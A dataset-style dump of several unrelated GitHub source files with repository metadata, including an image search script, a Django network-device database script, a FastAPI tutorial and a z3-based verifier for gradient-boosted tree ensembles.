blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
56b43d777dfaf6cb5b85e231c3a813f494637947
|
d03e5154b1b92616b9dbbef450f08d8fa32b04a9
|
/search_spatial_verify.py
|
a08858f19839f155f97b402830cb6cce4487c313
|
[] |
no_license
|
xiej23/image_search_engine
|
1a3dd670b3e1475f39e79ac3ac2279680760df9e
|
e46c4350890f27e5bb4c7e9f0ce13369b2050f64
|
refs/heads/master
| 2022-10-14T11:09:49.415703
| 2020-06-15T16:19:49
| 2020-06-15T16:19:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,586
|
py
|
# import the necessary packages
from __future__ import print_function
from descriptors.detectanddescribe import DetectAndDescribe
from ir.bagofvisualwords import BagOfVisualWords
from ir.spatialverifier import SpatialVerifier
from ir.searcher import Searcher
from resultmontage import ResultsMontage
from scipy.spatial import distance
from redis import Redis
from imutils.feature import FeatureDetector_create, DescriptorExtractor_create
import argparse
import pickle
import imutils
import json
import cv2
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True, help="Path to the directory of indexed images")
ap.add_argument("-f", "--features-db", required=True, help="Path to the features database")
ap.add_argument("-b", "--bovw-db", required=True, help="Path to the bag-of-visual-words database")
ap.add_argument("-c", "--codebook", required=True, help="Path to the codebook")
ap.add_argument("-i", "--idf", required=True, help="Path to inverted document frequencies array")
ap.add_argument("-r", "--relevant", required=True, help = "Path to relevant dictionary")
ap.add_argument("-q", "--query", required=True, help="Path to the query image")
args = vars(ap.parse_args())
# initialize the keypoint detector, local invariant descriptor, and descriptor
detector = FeatureDetector_create("SURF")
descriptor = DescriptorExtractor_create("RootSIFT")
dad = DetectAndDescribe(detector, descriptor)
# load the inverted document frequency array and codebook vocabulary, then
# initialize the bag-of-visual-words transformer
idf = pickle.loads(open(args["idf"], "rb").read())
vocab = pickle.loads(open(args["codebook"], "rb").read())
bovw = BagOfVisualWords(vocab)
# load the relevant queries dictionary and lookup the relevant results for the
# query image
relevant = json.loads(open(args["relevant"]).read())
queryFilename = args["query"][args["query"].rfind("/") + 1:]
queryRelevant = relevant[queryFilename]
# load the query image and process it
queryImage = cv2.imread(args["query"])
cv2.imshow("Query", imutils.resize(queryImage, width=320))
queryImage = imutils.resize(queryImage, width=320)
queryImage = cv2.cvtColor(queryImage, cv2.COLOR_BGR2GRAY)
# extract features from the query image and construct a bag-of-visual-words from it
(queryKps, queryDescs) = dad.describe(queryImage)
queryHist = bovw.describe(queryDescs).tocoo()
# connect to redis and perform the search
redisDB = Redis(host="localhost", port=6379, db=0)
searcher = Searcher(redisDB, args["bovw_db"], args["features_db"], idf=idf,distanceMetric=distance.cosine)
sr = searcher.search(queryHist, numResults=20)
print("[INFO] search took: {:.2f}s".format(sr.search_time))
# spatially verified the results
spatialVerifier = SpatialVerifier(args["features_db"], idf, vocab)
sv = spatialVerifier.rerank(queryKps, queryDescs, sr, numResults=20)
print("[INFO] spatial verification took: {:.2f}s".format(sv.search_time))
#initialize the result montage
montage = ResultsMontage((240,320), 5 , 20)
for (i, (score, resultID, resultIdx)) in enumerate(sv.results):
#load the result image and display it
print("[RESULT] {result_num}. {result} - {score:.2f}".format(result_num=i + 1,result=resultID, score=score))
result = cv2.imread("{}/{}".format(args["dataset"], resultID))
montage.addResult(result, text="#{}".format(i + 1),highlight=resultID in queryRelevant)
#show the output image of results
cv2.imshow("Results", imutils.resize(montage.montage, height=700))
cv2.waitKey(0)
searcher.finish()
spatialVerifier.finish()
|
[
"kaushalbhavsar0007@gmail.com"
] |
kaushalbhavsar0007@gmail.com
|
ff448bf4b1dfbc74d3d84fc327f77df4c1b8f27a
|
d93fe0484fc3b32c8fd9b33cc66cfd636a148ec4
|
/Codeforces/ECR91/probC.py
|
598044427a1d17ace008ba31acb2ec56b2763c53
|
[] |
no_license
|
wattaihei/ProgrammingContest
|
0d34f42f60fa6693e04c933c978527ffaddceda7
|
c26de8d42790651aaee56df0956e0b206d1cceb4
|
refs/heads/master
| 2023-04-22T19:43:43.394907
| 2021-05-02T13:05:21
| 2021-05-02T13:05:21
| 264,400,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 321
|
py
|
import sys
input = sys.stdin.readline
Q = int(input())
for _ in range(Q):
N, X = map(int, input().split())
A = list(map(int, input().split()))
A.sort(reverse=True)
ans = 0
count = 1
for a in A:
if count*a >= X:
ans += 1
count = 0
count += 1
print(ans)
|
[
"wattaihei.rapyuta@gmail.com"
] |
wattaihei.rapyuta@gmail.com
|
ba40440b518f567412c33fc4f87b3556b4301a36
|
55eef30f9337cffc2b820d2d2c37548d2c2a62da
|
/app/gmail_api.py
|
4f7fe564b52653c5b68230fb4ba8b5945eda50bf
|
[
"Apache-2.0"
] |
permissive
|
jssprz/HerokuFiles
|
9831f877625b3ec75aac6a313e152f7150d7e200
|
858f141e47ed8181c9ebcbb3bd792e989add05da
|
refs/heads/main
| 2023-06-14T18:59:05.106651
| 2021-07-05T15:39:39
| 2021-07-05T15:39:39
| 384,276,578
| 0
| 0
|
Apache-2.0
| 2021-07-09T00:05:57
| 2021-07-09T00:05:57
| null |
UTF-8
|
Python
| false
| false
| 466
|
py
|
import yagmail
from config import *
# Send file by email
yag = yagmail.SMTP(get_gmail_username(), get_gmail_password())
def upload_file(recipient, attachment):
"""
Send email with file
:param recipient: recipient of the email
:param attachment: path of local file to upload
:return:
"""
print(f"attachment {attachment}")
contents = ['Body of email', attachment]
yag.send(recipient, 'subject', contents)
|
[
"gcatanese@yahoo.com"
] |
gcatanese@yahoo.com
|
7bc7328946d119100d63d0050bae32701856b0b7
|
0973bb00298e4c1d9442f0335d996517f02e8ab4
|
/healingPython/argparse_prac2.py
|
390dffe82ef84ccaaa359d3ed0a6aa9cd62d2d78
|
[
"Apache-2.0"
] |
permissive
|
glayneon/amolang.cloud
|
3db1b038027eb7c1f509d710733072744dee8538
|
9bcba8191f12c858db03b2c7cdb31c441a8a77bd
|
refs/heads/master
| 2020-03-21T04:38:28.887845
| 2019-01-15T08:33:20
| 2019-01-15T08:33:20
| 138,119,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,276
|
py
|
#!python
import psutil
import logging
import random
import string
import time
import json
import argparse
import os
class slogger:
'''Make logger instance that will send message to STDOUT by default.
This class will make an instance using logging module.
Returns:
logging instance.
'''
_FMT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
def __init__(self):
'''
Initiator
'''
self.logger = logging.getLogger(__name__)
self.logger.setLevel(logging.INFO)
log2std = logging.StreamHandler()
log2std.setLevel(logging.INFO)
logFormat = logging.Formatter(self._FMT)
log2std.setFormatter(logFormat)
self.logger.addHandler(log2std)
self.logger.info("{} : Complete setting logger ...".format(self.__class__))
class randomFile(slogger):
'''Make the absolute path consists of sub-folder comprised to date and filename using random characters with 16 letters.
This class will make the absolute file path and name using random, string and time modules.
Returns:
random path instance.
'''
def __init__(self, verbose=False):
'''
Initiator
'''
super().__init__()
self.cwd = os.getcwd()
if verbose:
self.logger.info("Verbose mode is On ...")
def randomPath(self, targetDir=None):
'''
return random path
'''
self.targetDir = targetDir
tmpName = random.sample(string.ascii_letters, 12) + random.sample(string.digits, 4)
random.shuffle(tmpName)
if isinstance(self.targetDir, str):
self.randomName = self.targetDir + os.sep + time.strftime("%Y%m%d") + os.sep + ''.join(tmpName) + "_" + time.strftime("%H%M%S")
else:
self.targetDir = self.cwd
self.randomName = self.targetDir + os.sep + time.strftime("%Y%m%d") + os.sep + ''.join(tmpName) + "_" + time.strftime("%H%M%S")
self.logger.info("{} is generating now ...".format(self.randomName))
return self.randomName
class processStatus(slogger):
'''Check process status and return its status.
This class will check and return.
Parameters:
ProcessName (string)
Returns:
status instance.
'''
def __init__(self, verbose=False):
'''
Initiator
'''
super().__init__()
if verbose:
self.logger.info("Verbose mode is On ...")
def searchProcess(self, processName=None):
'''
Search Process using processName variable.
'''
_foundit = False
if isinstance(processName, str):
self.processName = processName
self.logger.info("Start searching {} in all processes ...".format(self.processName))
self.pslistNow = psutil.process_iter(attrs=['name', 'pid'])
for i in self.pslistNow:
if i.info['name'].lower() == self.processName.lower():
self.targetProcess = psutil.Process(i.info['pid'])
self.logger.info("{} status : {} ...".format(i.info['name'], self.targetProcess.status))
_foundit = True
else:
if _foundit:
self.logger.info("Searching is done ... ")
else:
self.logger.info("There's no named {} process now.".format(i.info['name']))
if __name__ == '__main__':
_verbose = False
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', help='increase the level of verbosity', action="store_true")
parser.add_argument('-d', '--dir', help='generate random filename using a given path', action='append')
parser.add_argument('-p', '--process', help='check the status of a given process', action='append')
args = parser.parse_args()
if args.verbose:
_verbose = True
if args.dir:
a = randomFile(verbose=_verbose)
for i in args.dir:
fileName = a.randomPath(targetDir=i)
a.logger.info("Random Path is {} ...".format(fileName))
if args.process:
b = processStatus(verbose=_verbose)
for i in args.process:
b.searchProcess(processName=i)
|
[
"yeraongon@gmail.com"
] |
yeraongon@gmail.com
|
67c2e46759a10cb31fe6e793beb35e7c09bfe4d5
|
5d5e13a94439792e7ee064875e373f555075d16d
|
/user/management/commands/add_user.py
|
9dacff713072a1e6f6ab807f7b45aa4b7a3b7218
|
[] |
no_license
|
Ishtiaq11/task_project
|
d39d44948df52ee24a46b037cc45475ba53ca9c2
|
462bc6b87ccfb2e49c7d9ebca8319eee2f5a1e95
|
refs/heads/main
| 2023-04-14T12:23:51.093886
| 2021-04-24T13:13:36
| 2021-04-24T13:13:36
| 356,129,910
| 0
| 0
| null | 2021-04-24T13:13:36
| 2021-04-09T04:04:09
|
Python
|
UTF-8
|
Python
| false
| false
| 1,191
|
py
|
from faker import Faker
from user.models import Role
from django.contrib.auth.models import User
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = 'Add new user'
def handle(self, *args, **kwargs):
Role.objects.all().delete()
User.objects.all().delete()
username = 'admin'
user = User.objects.create_user(username=username, password='123456', email='admin@admin.com',
first_name='Admin', last_name='Example')
user.is_superuser = False
user.is_staff = True
user.save()
role = Role(user_id=user.id, is_admin=True)
role.save()
for i in range(5):
fake = Faker()
name = fake.first_name()
user = User.objects.create_user(username=name.lower(), password='123456', email=fake.email(),
first_name=name, last_name=fake.last_name())
user.is_superuser = False
user.is_staff = False
user.save()
role = Role(user_id=user.id, is_admin=False)
role.save()
self.stdout.write('Added new user')
|
[
"rakibul.gononet@gmail.com"
] |
rakibul.gononet@gmail.com
|
64e00704caba99d1ada7ac855af53f7c04a28844
|
55c6343fa98a97ca375b53e244adfcf721fb68e5
|
/djangoProject/qyt_devices/insert_db/__init__.py
|
8a1e29255b843e436ee4e547a3841e38559e51ee
|
[] |
no_license
|
Prin-Meng/NetDevOps
|
7a835879fb55c26b792d06c729dcaf58c1427c5a
|
c852cdee300135320c3844c42755f0f6b1b6688a
|
refs/heads/master
| 2023-06-01T22:39:49.041141
| 2021-06-20T02:34:00
| 2021-06-20T02:34:00
| 345,110,429
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,877
|
py
|
import django
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangoProject.settings')
django.setup()
import time
from qyt_devices.tools.snmpv2_get import snmpv2_get
from qyt_devices.models import Devicetype, SNMPtype, DeviceSNMP, Devicedb, Devicecpu
# 删除现有的数据
Devicecpu.objects.all().delete()
Devicedb.objects.all().delete()
Devicetype.objects.all().delete()
DeviceSNMP.objects.all().delete()
SNMPtype.objects.all().delete()
# --------------------------设备类型------------------------------
device_type = ['CSR1000v','ASA']
for name in device_type:
device_type_router = Devicetype(name=name)
device_type_router.save()
# --------------------------设备snmp类型---------------------------
snmp_type = ['CPU Total 5Sec']
for name in snmp_type:
snmp_type_router = SNMPtype(name=name)
snmp_type_router.save()
# --------------------------设备snmp-----------------------------
device_snmp = [{'oid': '1.3.6.1.4.9.9.109.1.1.1.3.7',
'device_type_name': 'CSR1000v',
'snmp_type_name': 'CPU Total 5Sec'
}, ]
for dict_info in device_snmp:
device_snmp_router = DeviceSNMP(
oid=dict_info['oid'],
device_type=Devicetype.objects.get(name=dict_info['device_type_name']),
snmp_type=SNMPtype.objects.get(name=dict_info['snmp_type_name'])
)
device_snmp_router.save()
# --------------------------设备信息------------------------------
device_db = [{'device_name': '网关路由器',
'device_ip': '192.168.0.66',
'description': '乾颐堂网络实验室',
'snmp_ro_community': 'tcpipro',
'snmp_rw_community': 'tcpiprw',
'ssh_username': 'prin',
'ssh_password': 'Cisc0123',
'enable_password': 'cisco',
'device_type_name': 'CSR1000v'
},
{'device_name': '核心路由器',
'device_ip': '192.168.0.88',
'description': '乾颐堂网络实验室',
'snmp_ro_community': 'tcpipro',
'snmp_rw_community': 'tcpiprw',
'ssh_username': 'prin',
'ssh_password': 'Cisc0123',
'enable_password': 'cisco',
'device_type_name': 'CSR1000v'
}]
for dict_info in device_db:
device_db_router = Devicedb(
name=dict_info['device_name'],
ip=dict_info['device_ip'],
description=dict_info['description'],
snmp_ro_community=dict_info['snmp_ro_community'],
snmp_rw_community=dict_info['snmp_rw_community'],
ssh_username=dict_info['ssh_username'],
ssh_password=dict_info['ssh_password'],
enable_password=dict_info['enable_password'],
type=Devicetype.objects.get(name=dict_info['device_type_name'])
)
device_db_router.save()
# --------------------------设备CPU信息----------------------------
print('收集信息中......')
for x in range(10):
snmpv2_info = snmpv2_get("192.168.0.66", "tcpipro", "1.3.6.1.4.1.9.9.109.1.1.1.1.3.7", port=161)
device_cpu_router = Devicecpu(device=Devicedb.objects.get(name='网关路由器'), cpu_usage=snmpv2_info[1])
device_cpu_router.save()
# snmpv2_info = snmpv2_get("192.168.0.88", "tcpipro", "1.3.6.1.4.1.9.9.109.1.1.1.1.3.7", port=161)
# device_cpu_router = Devicecpu(device=Devicedb.objects.get(name='核心路由器'), cpu_usage=snmpv2_info[1])
#
# device_cpu_router.save()
time.sleep(1)
gw = Devicedb.objects.get(name='网关路由器')
print(gw)
# 进行外键搜素
snmp_info = gw.type.devicesnmp.all()
for snmp in snmp_info:
print(f"SNMP类型:{snmp.snmp_type.name:<20}| OID:{snmp.oid}")
cpu_info = gw.cpu_usage.all()
for cpu in cpu_info:
print(f"CPU利用率:{cpu.cpu_usage:<5}| 记录时间:{cpu.record_datetime.strftime('%Y-%m-%d %H:%M:%S')}")
|
[
"772062725@qq.com"
] |
772062725@qq.com
|
d5ca3132b484042d95161fff6c873954396d1563
|
f6cb1b34668f4e864836c595efce40083baa8f91
|
/tests2/tests/fbttn/test_sensor.py
|
94e28644f7309226bb77717cdcae9373616fa8da
|
[] |
no_license
|
isabella232/openbmc
|
d419d61092f457d2c25a057831fc8d56cd482e8a
|
7a0ece893ac2d985af85701d8a003fa62a34cae0
|
refs/heads/helium
| 2023-04-06T06:29:29.854842
| 2021-04-16T01:04:35
| 2021-04-16T01:54:48
| 358,585,013
| 0
| 0
| null | 2021-04-16T12:02:45
| 2021-04-16T12:01:40
| null |
UTF-8
|
Python
| false
| false
| 1,571
|
py
|
#!/usr/bin/env python3
#
# Copyright 2018-present Facebook. All Rights Reserved.
#
# This program file is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program in a file named COPYING; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA
#
import unittest
from common.base_sensor_test import SensorUtilTest
from tests.fbttn.test_data.sensors.sensors import SENSORS
class MBSensorTest(SensorUtilTest, unittest.TestCase):
FRU_NAME = "server"
def set_sensors_cmd(self):
self.sensors_cmd = ["/usr/local/bin/sensor-util {}".format(self.FRU_NAME)]
def test_sensor_keys(self):
result = self.get_parsed_result()
for key in SENSORS[self.FRU_NAME]:
with self.subTest(sensor=key):
self.assertIn(key, result.keys(), "Missing sensor {}".format(key))
class NicSensorTest(MBSensorTest):
FRU_NAME = "nic"
class IOMSensorTest(MBSensorTest):
FRU_NAME = "iom"
class DPBSensorTest(MBSensorTest):
FRU_NAME = "dpb"
class SCCSensorTest(MBSensorTest):
FRU_NAME = "scc"
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
5e8bc96eb0f62899702d662ace41b95f18a39518
|
88a925c350db834972db7190f41d776d20f4345d
|
/fastapi/basic/response_model.py
|
a530b18388d21630e05d115c75f868dc79c26837
|
[] |
no_license
|
IndominusByte/deeplearn-all-stuff-fastapi
|
037b0c032895790f5becf9a1ebd10af337a4249f
|
81c60e603081aae5f0b16e9a4d62e894b966df3e
|
refs/heads/master
| 2022-12-26T00:52:34.810929
| 2020-10-03T09:42:45
| 2020-10-03T09:42:45
| 293,742,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,983
|
py
|
from fastapi import FastAPI
from pydantic import BaseModel, EmailStr, SecretStr
from typing import Optional, List
class Item(BaseModel):
name: str
description: Optional[str] = None
price: float
tax: Optional[float] = None
tags: List[str] = []
class Config:
min_anystr_length = 1
anystr_strip_whitespace = True
app = FastAPI()
"""
The response model is declared in this parameter instead of as a function return type annotation, because the path function may not actually return that response model but rather return a dict, database object or some other model, and then use the response_model to perform the field limiting and serialization.
"""
@app.post('/items', response_model=Item)
def create_items(item: Item):
return item
# best practice
class UserIn(BaseModel):
username: str
password: SecretStr
email: EmailStr
fullname: Optional[str] = None
class UserOut(BaseModel):
username: str
email: EmailStr
fullname: Optional[str] = None
# @app.post('/user', response_model=UserOut)
# def create_user(user: UserIn):
# return user
"""
You can set the path operation decorator parameter response_model_exclude_unset=True
and those default values won't be included in the response, only the values actually set.
You can also use:
- response_model_exclude_defaults=True
- response_model_exclude_none=True
"""
# @app.post('/user', response_model=UserOut, response_model_exclude_unset=True)
# def create_user(user: UserIn):
# return user
"""
You can also use the path operation decorator parameters response_model_include and response_model_exclude. like pydantic except you should add response_model at beginning
"""
# @app.post('/user', response_model=UserOut, response_model_include={'username','email'})
# def create_user(user: UserIn):
# return user
@app.post('/user', response_model=UserOut, response_model_exclude={'username','email'})
def create_user(user: UserIn):
return user
|
[
"nyomanpradipta120@gmail.com"
] |
nyomanpradipta120@gmail.com
|
28371737c4499d4f72faf4720e96071758777642
|
9d40c348e256bd74455521a7a11d8a4ab5d0d9f0
|
/test_etest/test_fixtures/test_scripts/7d982739ef8348d48935d14cb74f160d.py
|
2e1f28c61605c8c7c4ae4761faf3deaaa2518ba2
|
[] |
no_license
|
tianon/etest
|
acf5bd2f06cf9a5024353cfc8128c3e968b889c2
|
01f24e46caaa3c75c48c43e59a8c03da81e06e3b
|
refs/heads/master
| 2021-01-17T20:11:43.244552
| 2015-05-03T15:10:06
| 2015-05-03T15:10:33
| 36,564,139
| 0
| 0
| null | 2015-05-30T15:38:31
| 2015-05-30T15:38:31
| null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
# Copyright (C) 2014 by Alex Brandt <alunduil@alunduil.com>
#
# etest is freely distributable under the terms of an MIT-style license.
# See COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_etest.test_fixtures.test_scripts import SCRIPTS
_ = '''
python_test() {
nosetests || die "Tests failed under ${EPYTHON}"
}
''' # flake8: noqa — inline bash script with tabs
_ = {
'uuid': '7d982739ef8348d48935d14cb74f160d',
'description': 'function definition',
'text': _,
'symbols': {
},
'correct': None,
}
SCRIPTS.setdefault('all', []).append(_)
SCRIPTS.setdefault('bash', []).append(_)
|
[
"alunduil@alunduil.com"
] |
alunduil@alunduil.com
|
4a3d9d581d12ea1ae3ea021e342e85d3169f537d
|
6d443be5a5dbff062257cd40c4f5b4945812004b
|
/qtas/ensemble.py
|
9de83db94dbfa762a7200ef6bbf7bc28916e6aa3
|
[
"BSD-3-Clause"
] |
permissive
|
nokia/gradient-boosted-models-verifier
|
fe83f1e918b75deec30ff3bb0e1e67fa8fa1add9
|
e2db19d86e39cb2b82a3f6249305459f18b7fda4
|
refs/heads/main
| 2023-05-30T23:30:18.851292
| 2021-06-14T07:16:25
| 2021-06-14T07:16:25
| 374,602,869
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,222
|
py
|
# -*- coding: utf-8 -*-
# © 2018-2019 Nokia
#
#Licensed under the BSD 3 Clause license
#SPDX-License-Identifier: BSD-3-Clause
import numpy
# import math
from z3 import * # @UnusedWildImport
from sklearn.ensemble import GradientBoostingClassifier
# from sklearn.tree import _tree
from xgboost.sklearn import XGBClassifier
from .xgbparser import parse_trees
from . import VeriGbError
from tkinter.tix import Form
print("dasd")
class IDecisionTreeEnsembleFormalRegressorModel():
'''
An interface for decision tree ensemble regressor or a single classifier class.
When class_label is not provided, this represent a single regression model.
If class_label is given, then it represent a single class within a classification model.
'''
def __init__(self, solver_mng, metadata, class_label):
'''
metadata.get_num_labels() must be strictly greater than class_label.
regressor is the special case where metadata.get_num_labels()=1 and class_label=0.
:param solver_mng: variable manager
:param metadata:
:param class_label:
'''
self.solver_mng = solver_mng
self.class_label = class_label
self.metadata = metadata
if (self.class_label >= self.metadata.get_num_labels()):
raise VeriGbError("wrong label invocation of tree ensemble")
#
def _close_construction(self,model_id):
'''
Can and must be called at the end of the child construction
(only after the child information is all set up and ready...).
'''
model_id=str(model_id)
for tree_idx in range(self.get_num_trees()):
self.solver_mng.create_aux_var("%sL%sOUT%s" % (str(model_id),self.get_label(), tree_idx))
self.solver_mng.create_aux_var('L%sSUM%s' % (self.get_label(),model_id))
self.solver_mng.create_output_var('OUTPUT%s' %model_id )
def __get_sum_variable(self,i):
new_sum='L%sSUM'+str(i)
return self.solver_mng.get_aux_var(new_sum % self.get_label())
def __get_tree_val_variable(self, tree_idx,i):
return self.solver_mng.get_aux_var("%sL%sOUT%s" % (str(i),self.get_label(), tree_idx))
def get_gt_constraints(self, other_regressor_ensemble):
return (self.__get_sum_variable(1) > other_regressor_ensemble.__get_sum_variable(1))
def get_label(self):
return self.class_label
def get_num_classes(self):
return self.metadata.get_num_labels()
def get_ge_zero(self,i):
return (self.__get_sum_variable(i) >= 0)
def get_ensemble_expr(self, observation=None, epsilon=float('inf'), min_val=float('-inf'), max_val=float('inf'), optimize_l1=False, i=0):
'''
Note that in order to get a general ensemble expression (not related to an observation),
you can simply invoke this function without setting anything to epsilon...
In such a case observation will be ignored...
Also note that the min_val, max_val (and epsilon as well) limits the tree walk (removes branches),
it DOES NOT mean that the assigned value cannot be below or above resp.
The restriction to the assignment needs to be done through the property!
:param observation:
:param epsilon:
:param min_val:
:param max_val:
:param optimize_l1:
'''
trees_expr = True
# TODO: check for z3.Sum
sum_expr = self.get_base_predictor()
for tree_idx in range(0, self.get_num_trees()):
# evaluated the tree itself
trees_expr = And(trees_expr, self.get_tree_clause_expr(tree_idx, observation, epsilon, min_val, max_val, optimize_l1,i))
# accumulate the sum expression
sum_expr = sum_expr + self.__get_tree_val_variable(tree_idx,i)
# final expression
return And(trees_expr, (self.__get_sum_variable(i) == sum_expr))
def get_tree_clause_expr(self, tree_idx, observation=None, epsilon=float('inf'), min_val=float('-inf'), max_val=float('inf'), optimize_l1=False,indx=1):
num_of_features = self.metadata.get_num_features()
if (isinstance(min_val, list) and (len(min_val) != num_of_features)):
raise VeriGbError("array length do not match")
if (isinstance(max_val, list) and (len(max_val) != num_of_features)):
raise VeriGbError("array length do not match")
if (isinstance(epsilon, list) and (len(epsilon) != num_of_features)):
raise VeriGbError("array length do not match")
if (isinstance(epsilon, list) and optimize_l1):
raise VeriGbError("epsilon cannot be a list for l1 optimisation")
if (isinstance(observation, list) and (len(observation) != num_of_features)):
raise VeriGbError("array length do not match")
if (epsilon == float('inf')):
observation = numpy.zeros(num_of_features)
lower_range = numpy.zeros(num_of_features)
upper_range = numpy.zeros(num_of_features)
for i in range(num_of_features):
min_v = min_val if (not isinstance(min_val, list)) else min_val[i]
max_v = max_val if (not isinstance(max_val, list)) else max_val[i]
epsilon_v = epsilon if (not isinstance(epsilon, list)) else epsilon[i]
#
upper_range[i] = min(observation[i] + abs(epsilon_v), max_v)
if (math.isinf(epsilon_v) and math.isinf(max_v)): upper_range[i] = float('inf')
lower_range[i] = max(observation[i] - abs(epsilon_v), min_v)
if (math.isinf(epsilon_v) and math.isinf(min_v)): lower_range[i] = float('-inf')
tree_instance = self.get_tree(tree_idx)
def build_tree_clause_helper(node_idx, depth, ret_constraint_list, accum_min_epsi, rec_accum=[],indx=1):
feature_idx = tree_instance.feature[node_idx]
# stop case...
if(self.is_leaf(tree_idx, node_idx)):
# val = self.get_learning_rate() * self.get_node_value(tree_idx, node_idx)
val = self.get_node_value(tree_idx, node_idx)
rec_accum.append(self.__get_tree_val_variable(tree_idx,indx) == val)
if (not optimize_l1):
ret_constraint_list.append(And(*rec_accum))
# else, optimize_l1 is True
elif ((not isinstance(epsilon, list)) and (accum_min_epsi <= epsilon)):
ret_constraint_list.append(And(*rec_accum))
# else: # not adding this path
# print("-- removing un-necessary branch...!")
rec_accum.pop()
return
# else..
FEATURE_VAR = self.solver_mng.get_feature_var(self.metadata.get_feature_names(feature_idx))
#==============================================================
# Note: if the lower range is not relevant, then it will skip this part.
new_accum_min_epsi = accum_min_epsi
if (self.get_node_condition(tree_idx, node_idx, lower_range[feature_idx])):
if (isinstance(observation, list) and (not self.get_node_condition(tree_idx, node_idx, observation[feature_idx]))):
new_accum_min_epsi += abs(observation[feature_idx] - self.get_node_threshold(tree_idx, node_idx))
rec_accum.append(self.get_node_condition(tree_idx, node_idx, FEATURE_VAR))
build_tree_clause_helper(self.get_true_child(tree_idx, node_idx), depth + 1, ret_constraint_list, new_accum_min_epsi, rec_accum,indx)
rec_accum.pop()
new_accum_min_epsi = accum_min_epsi
if (not self.get_node_condition(tree_idx, node_idx, upper_range[feature_idx])):
if (isinstance(observation, list) and (self.get_node_condition(tree_idx, node_idx, observation[feature_idx]))):
new_accum_min_epsi += abs(self.get_node_threshold(tree_idx, node_idx) - observation[feature_idx])
rec_accum.append(Not(self.get_node_condition(tree_idx, node_idx, FEATURE_VAR)))
build_tree_clause_helper(self.get_false_child(tree_idx, node_idx), depth + 1, ret_constraint_list, new_accum_min_epsi, rec_accum,indx)
rec_accum.pop()
# # invoking the recursive all...
constraint_list = []
build_tree_clause_helper(0, 1, constraint_list, 0,indx=indx)
return Or(*constraint_list)
#===========================================================================
# # abstract interfaces
#===========================================================================
def get_base_predictor(self):
raise NotImplementedError("Not implemented yet")
def get_learning_rate(self):
raise NotImplementedError("Not implemented yet")
def get_num_trees(self):
raise NotImplementedError("Not implemented yet")
def get_tree(self, tree_idx):
raise NotImplementedError("Not implemented yet")
def get_node_condition(self, tree_idx, node_idx, val):
'''
Note that this getter can be used with a scalar value 'val', in which case
it will return True/False, or an SMT variable in which case it will return
an expression.
:param tree_idx:
:param node_idx:
:param val:
'''
raise NotImplementedError("Not implemented yet")
def get_true_child(self, tree_idx, node_idx):
raise NotImplementedError("Not implemented yet")
def get_false_child(self, tree_idx, node_idx):
raise NotImplementedError("Not implemented yet")
def is_leaf(self, tree_idx, node_idx):
raise NotImplementedError("Not implemented yet")
def get_node_value(self, tree_idx, node_idx):
raise NotImplementedError("Not implemented yet")
def get_node_threshold(self, tree_idx, node_idx):
raise NotImplementedError("Not implemented yet")
# Adapter
class SklFormalRegressorModel(IDecisionTreeEnsembleFormalRegressorModel):
'''
sklearn implementation
'''
def __init__(self, solver_mng, metadata, skl_gb_regression_model, class_label,model_id):
IDecisionTreeEnsembleFormalRegressorModel.__init__(self, solver_mng, metadata, class_label)
self.model = skl_gb_regression_model;
# only now we know the amount of trees --> finishing the super constructor
IDecisionTreeEnsembleFormalRegressorModel._close_construction(self, model_id)
def get_base_predictor(self):
# FIXME: check if correct for regressor case
return self.model.init_.priors[self.get_label()]
def get_learning_rate(self):
return self.model.learning_rate
def get_num_trees(self):
return len(self.model.estimators_) # actually instantiated
def get_tree(self, tree_idx):
# FIXME: check if correct for regressor case
return self.model.estimators_[tree_idx, self.get_label()].tree_
#===========================================================================
# Note that the condition is different than xgboost...
#===========================================================================
def get_node_condition(self, tree_idx, node_idx, val):
if (isinstance(val , float) and (val == float("-inf"))): return True
if (isinstance(val , float) and (val == float("inf"))): return False
return (val <= self.get_node_threshold(tree_idx, node_idx))
def get_true_child(self, tree_idx, node_idx):
return self.get_tree(tree_idx).children_left[node_idx]
def get_false_child(self, tree_idx, node_idx):
return self.get_tree(tree_idx).children_right[node_idx]
def is_leaf(self, tree_idx, node_idx):
a_tree = self.get_tree(tree_idx)
feature_idx = a_tree.feature[node_idx]
